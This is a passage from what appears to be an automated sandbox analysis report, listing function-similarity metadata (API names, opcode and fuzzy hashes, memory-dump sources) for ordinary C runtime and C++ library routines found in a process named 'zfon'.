                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulxiswctype$DscaleStofltStoxflt
                                                                                                • String ID:
                                                                                                • API String ID: 1993114911-0
                                                                                                • Opcode ID: 93daba1b2ca0e0d8915cb4de3bf39f6ce065bf3dbf861f4ba4fb38182f6be529
                                                                                                • Instruction ID: 4795fe0712f1b8d1740dccb9c5057895dfbf88a97185a7c0cf67c53cb2ca43f7
                                                                                                • Opcode Fuzzy Hash: 93daba1b2ca0e0d8915cb4de3bf39f6ce065bf3dbf861f4ba4fb38182f6be529
                                                                                                • Instruction Fuzzy Hash: A5617F22F0C9869AEB11DEAED4806FD3761AB54788F544636DF1D63B95DE3CE90B8300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$DscaleStofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                • String ID:
                                                                                                • API String ID: 1561094175-0
                                                                                                • Opcode ID: 26f20ec9df820aa32de266d0aeb6ef9945677f21c9edbebf0351e67feff02a77
                                                                                                • Instruction ID: 515b5befd5bc9f2ca13445a7fe362f4756e919f877b74aab907b719a9ad64de8
                                                                                                • Opcode Fuzzy Hash: 26f20ec9df820aa32de266d0aeb6ef9945677f21c9edbebf0351e67feff02a77
                                                                                                • Instruction Fuzzy Hash: 1A61C126F1CE8686EF11DE6DE4806BE6721FB84784F500932EF5E17699DE3CE5468B00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$StofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                • String ID:
                                                                                                • API String ID: 3077680349-0
                                                                                                • Opcode ID: 68dfcd458d3605dce68000bdeb4d798d5053b9c95eebfd4242a2a1a3d2f218f3
                                                                                                • Instruction ID: 5012e2021001e185a33d51438c76e7236deb4cbc30aa8c80e76f82a429ad9699
                                                                                                • Opcode Fuzzy Hash: 68dfcd458d3605dce68000bdeb4d798d5053b9c95eebfd4242a2a1a3d2f218f3
                                                                                                • Instruction Fuzzy Hash: 1461B122F1CE8282EA51DE6DE4805BE7720FB94784F504532EF5E53A89DE3CE54A8B00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$StofltStoxfltXp_addhXp_mulh
                                                                                                • String ID:
                                                                                                • API String ID: 3654286868-0
                                                                                                • Opcode ID: 56d0606d6971f6acfb222be0b758f0c72f6c494c9e9316963bc2f0e9e72bf29e
                                                                                                • Instruction ID: bdf15e8ff0cbb8099ec233c3335d477d5ffb1e733cb38053f4b967995bb77b4c
                                                                                                • Opcode Fuzzy Hash: 56d0606d6971f6acfb222be0b758f0c72f6c494c9e9316963bc2f0e9e72bf29e
                                                                                                • Instruction Fuzzy Hash: 64618F22F1CE8282EB51DE6DE4806AEB720FB95784F514532EF5E13795DE3CD54A8B00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 2943138195-0
                                                                                                • Opcode ID: 214de0f7f58aac0764383bd34bc169b25bbdf3ac85b5305c3b37a2798d5e2b6f
                                                                                                • Instruction ID: 8508fe617a32497465544f251389552a53595c94fd00d0a39ae46f76c54b5a89
                                                                                                • Opcode Fuzzy Hash: 214de0f7f58aac0764383bd34bc169b25bbdf3ac85b5305c3b37a2798d5e2b6f
                                                                                                • Instruction Fuzzy Hash: 0FF13876B08A869EF711DFA8E4A01FC37A1AB0478CB448436EB4D57A99DF3CE519C340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 511923668-4289949731
                                                                                                • Opcode ID: a03a9e90f11697dc1fe6c9e6f472531f76fb679d3088bb41c89f670e4d9fa8ce
                                                                                                • Instruction ID: 83379ecc1728aede37d8775b987d642aaa95c40b022caf21fdd7aa857a5d882a
                                                                                                • Opcode Fuzzy Hash: a03a9e90f11697dc1fe6c9e6f472531f76fb679d3088bb41c89f670e4d9fa8ce
                                                                                                • Instruction Fuzzy Hash: 6C419221A08B4281EB18FF15A94427CA272EB54BE4FD40535C63E077DDDF2EE49183A6
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xbad_alloc@std@@memcpy
                                                                                                • String ID: scene
                                                                                                • API String ID: 1435337725-3648647130
                                                                                                • Opcode ID: a646100d8f9e4bff7fec30077bbb3d5b881434a8c068ff93666efa5abf00f7d9
                                                                                                • Instruction ID: a865bb4a33a96f701258b7eeff62af35d2c7a98c5e5028f23047fd7b4640dbdb
                                                                                                • Opcode Fuzzy Hash: a646100d8f9e4bff7fec30077bbb3d5b881434a8c068ff93666efa5abf00f7d9
                                                                                                • Instruction Fuzzy Hash: 38417361A0975650FB18BF15A808338A2B3EB44BF8FD40634DA3D066DCDF7DA49182F6
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FD76
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FD93
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FDC9
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FDF4
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE11
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE3A
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE72
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910FEAE
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B910FD9E
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B910FE1C
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B910FE68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: callocfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpystd::bad_alloc::bad_alloc
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1633071956-35662545
                                                                                                • Opcode ID: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                • Instruction ID: 0b05f6547cba95b168bc0006ed5007c14b8ef9bf9b04bf43398afd7207229c9d
                                                                                                • Opcode Fuzzy Hash: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                • Instruction Fuzzy Hash: EC41CE62B09BC196EB118F29A9097A86BA1FB48FD0F598274DF5D07395EF3CE445C340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$cef_string_map_allocmallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 871575421-0
                                                                                                • Opcode ID: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                • Instruction ID: 7d2784b025fcd6e66242c1e2fc2fbb28b7a9d29f972899b4123fd8367131f094
                                                                                                • Opcode Fuzzy Hash: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                • Instruction Fuzzy Hash: 14D17A62B09A4585EF14EF65D8443ACA3B2EB44BDCF848536CE2D537E8EF28D445C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__strncntfreemalloc$CompareInfoString__crt
                                                                                                • String ID:
                                                                                                • API String ID: 1548350897-0
                                                                                                • Opcode ID: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                • Instruction ID: f5443c0196322fb56adb43b82f8d50fc81350934525b69a360786bbba8bfdc46
                                                                                                • Opcode Fuzzy Hash: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                • Instruction Fuzzy Hash: E3919EB2E08AC296EF318F6D94507B976A1AF44BE4F584632DB7D067C6DE2CE5468300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3856544966-0
                                                                                                • Opcode ID: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                • Instruction ID: 9773da3f931f8b8181232f486ea23f6350196184dd451ae88b29e2b9ef15a879
                                                                                                • Opcode Fuzzy Hash: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                • Instruction Fuzzy Hash: FD91BF32B09B4699EB14EF65D8443BDA3B2AB49B98F844431CA2D077D8EF3CD445C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 4223619315-393685449
                                                                                                • Opcode ID: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                • Instruction ID: f71b7b6941b74bddbb73dadfca53ae3bc464871f2cab0d673a0c9f449b6958e8
                                                                                                • Opcode Fuzzy Hash: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                • Instruction Fuzzy Hash: F3D16B73A087418AEB609BA9D4602AD77A1FB45BC8F540139EF8D57B95DF3CE0A1C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Replicator::operator[]
                                                                                                • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                • API String ID: 3676697650-3207858774
                                                                                                • Opcode ID: d6d96e58e56aecf7a62acf838a8154a9c3b739b48ea3dca409ea4180aa86bfee
                                                                                                • Instruction ID: 2bef2af664398d10e22549bea3a68b552e6555d3568c9de7a30115582c79140e
                                                                                                • Opcode Fuzzy Hash: d6d96e58e56aecf7a62acf838a8154a9c3b739b48ea3dca409ea4180aa86bfee
                                                                                                • Instruction Fuzzy Hash: 13917C22B18A86A9FB609FA8D4602BC77A1AF587C8F984132EB4D03795DF3CF545C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC2F5
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC312
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B90FC32E
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC337
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC354
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B90FC370
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B90FC385
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90FC31D
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B90FC35F
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B90FC37E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 2460671452-35662545
                                                                                                • Opcode ID: 0820c1a4a04c52d0eb239fbab98a74cf88671c412056eb74643d8d24ad950682
                                                                                                • Instruction ID: 0a10358e2703d7641f789e8ccffb16aa144daec9f28efddf4113fe130d1abde0
                                                                                                • Opcode Fuzzy Hash: 0820c1a4a04c52d0eb239fbab98a74cf88671c412056eb74643d8d24ad950682
                                                                                                • Instruction Fuzzy Hash: BD214F22A08B8182EB00DF29E4412A877A1FF98FC4F448535DB4D57756EF3CE586C380
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$cef_string_map_allocmallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 940974311-0
                                                                                                • Opcode ID: 33a35221359f596db583780524ca83e01fac178137d3890bcdf752d64281db90
                                                                                                • Instruction ID: f897b5a79c60c2c08dab6ba0d3778919d151b330f7079f4989ceaa22fca1d1f1
                                                                                                • Opcode Fuzzy Hash: 33a35221359f596db583780524ca83e01fac178137d3890bcdf752d64281db90
                                                                                                • Instruction Fuzzy Hash: C3A16062B04B4585EF14EF65D8583AC63B2EB85BD8F848535CE2E17BD8EE28D445C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1019560052-0
                                                                                                • Opcode ID: 1f5262a16c04021e3a90f13f385dbb394579881b511105779db3e6e7012f87b8
                                                                                                • Instruction ID: 3c574df74db5869409f6c20cac53ab41bc55ab1f0eeb7d0add516ef71f339b63
                                                                                                • Opcode Fuzzy Hash: 1f5262a16c04021e3a90f13f385dbb394579881b511105779db3e6e7012f87b8
                                                                                                • Instruction Fuzzy Hash: 2981C262B04B4585EF14EF65D8543ACA3B2EB85BE8F448635CE3E17BDDEE28D4418350
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
